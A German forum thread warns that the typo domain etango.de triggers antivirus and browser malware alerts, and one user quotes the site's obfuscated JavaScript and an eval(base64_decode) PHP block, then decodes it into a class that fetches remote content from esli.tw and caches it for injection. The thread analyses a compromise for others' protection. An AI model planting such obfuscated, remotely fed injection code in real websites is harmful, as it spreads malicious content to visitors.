Achtung: Wer statt der plattform etengo.de etango tipp, kriegt einen Virus instaliert! mein virenscanner hat es zufällig gemerkt!
:
Verschoben durch Moderator
Nein: Der Avast Virenscanner findet 3 Dateien, die sich beim Aufruf der Seite temporär platzieren und als trojanische Pferde erkannnt werden. Der meldet sehr selten einen alert, bin richtig erschrocken.
Interessant. AntiVir spricht auch an, nach einigen Sekunden schmiert dann Iron ab.
Das sagt mein Firefox: Als attackierend gemeldete Website! Die Website auf etango.de wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert. Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen. Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert. Ich verstehe nur, nicht, wer das jetzt erkannt hat, mein Firefox?
Also Google Chrome warnt mich auch!!!!!!!!!! Um was wetten wir das wenn man IE hat der einen nicht warnt!
Google Chrome warnt dich sicher auch, wenn du zu wenig Daten pro Monat an Google sendest...
> Ich verstehe nur, nicht, wer das jetzt erkannt hat, mein Firefox?
Ich habe es gefunden: Es ist mein Firefox, man kann es unter
"Extras-Einstellungen-Sicherheit" anklicken. Das war bei mir
standardmaessig angeklickt.
Lustiges Zeug machen die da:
1 | <body bgcolor="#bdcaf6"><script>function c246dea728q4ac58d66bf6df(q4ac58d66bfeac){
|
2 | function q4ac58d66c067a(){var q4ac58d66c0e4a=16;return q4ac58d66c0e4a;}
|
3 | return (eval('pa'+'rseInt')
|
4 | (q4ac58d66bfeac,q4ac58d66c067a()));} |
5 | function q4ac58d66c161a(q4ac58d66c1de9){ var q4ac58d66c3557=2;
|
6 | var q4ac58d66c25b8='';q4ac58d66c44f7=String['fromCharCode']; |
7 | for(q4ac58d66c2d88=0;q4ac58d66c2d88<q4ac58d66c1de9.length; |
8 | q4ac58d66c2d88+=q4ac58d66c3557){ q4ac58d66c25b8+=(q4ac58d66c44f7(c246dea728q4ac58d66bf6df
|
9 | (q4ac58d66c1de9.substr(q4ac58d66c2d88,q4ac58d66c3557))));}return |
10 | |
11 | usw. usf. |
12 | |
13 | <?eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEd
|
14 | ldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczsNCmNsYXNzIEdldExpbmtzDQp7D |
15 | QoJdmFyICRob3N0ID0gImVzbGkudHciOw0KCXZhciAkcGF0aCA9ICIvbG |
16 | |
17 | ... |
(Im Original alles auf 19 Zeilen gequetscht, 14 KiB.)
Die haben einfach die Variablennamen durch ein zufällige buchstaben+nummern ersetzt...billig unkenntlich gemacht.
Wird man wohl durch nen Obfuscator gejagt haben, zum Schutz geistigen Eigentums ;)
Habe mal den ersten base64-Block durch den Dekoder geschoben:
1 | error_reporting(0); |
2 | $links = new GetLinks(); |
3 | |
4 | echo $links->Links; |
5 | class GetLinks |
6 | {
|
7 | var $host = "esli.tw"; |
8 | var $path = "/link.php?site="; |
9 | var $site = ""; |
10 | var $user_agent = ""; |
11 | |
12 | var $Links = ""; |
13 | |
14 | |
15 | var $_socket_timeout = 12; |
16 | var $_cashe_life_time = 3600; |
17 | var $_cashe_file = "cashe.txt"; |
18 | |
19 | function GetLinks() |
20 | {
|
21 | if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
|
22 | |
23 | $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST']; |
24 | $this->user_agent = $_SERVER['HTTP_USER_AGENT']; |
25 | |
26 | $this->Links = $this->fetch_remote_file(); |
27 | if ($handle = fopen($this->_cashe_file, 'w')) {
|
28 | fwrite($handle, $this->Links); |
29 | } |
30 | |
31 | fclose($handle); |
32 | } |
33 | else {
|
34 | $this->Links = file_get_contents($this->_cashe_file); |
35 | } |
36 | } |
37 | |
38 | function fetch_remote_file() |
39 | {
|
40 | $buff = ''; |
41 | $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout); |
42 | if (!$fp) {
|
43 | |
44 | } else {
|
45 | $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
|
46 | $out .= "Host: {$this->host}\r\n";
|
47 | $out .= "Connection: Close\r\n\r\n"; |
48 | |
49 | fwrite($fp, $out); |
50 | while (!feof($fp)) {
|
51 | $buff .= fgets($fp, 128); |
52 | } |
53 | fclose($fp); |
54 | $page = explode("\r\n\r\n", $buff);
|
55 | return $page[1]; |
56 | } |
57 | } |
58 | } |
domreg -at- de.mail.internet-medien.com ist der für die Domain zuständige technical contact. Vielleicht sollte dem ja mal jemand eine Nachricht zukommen lassen...
Thread beobachten
Seitenaufteilung abschaltenBitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.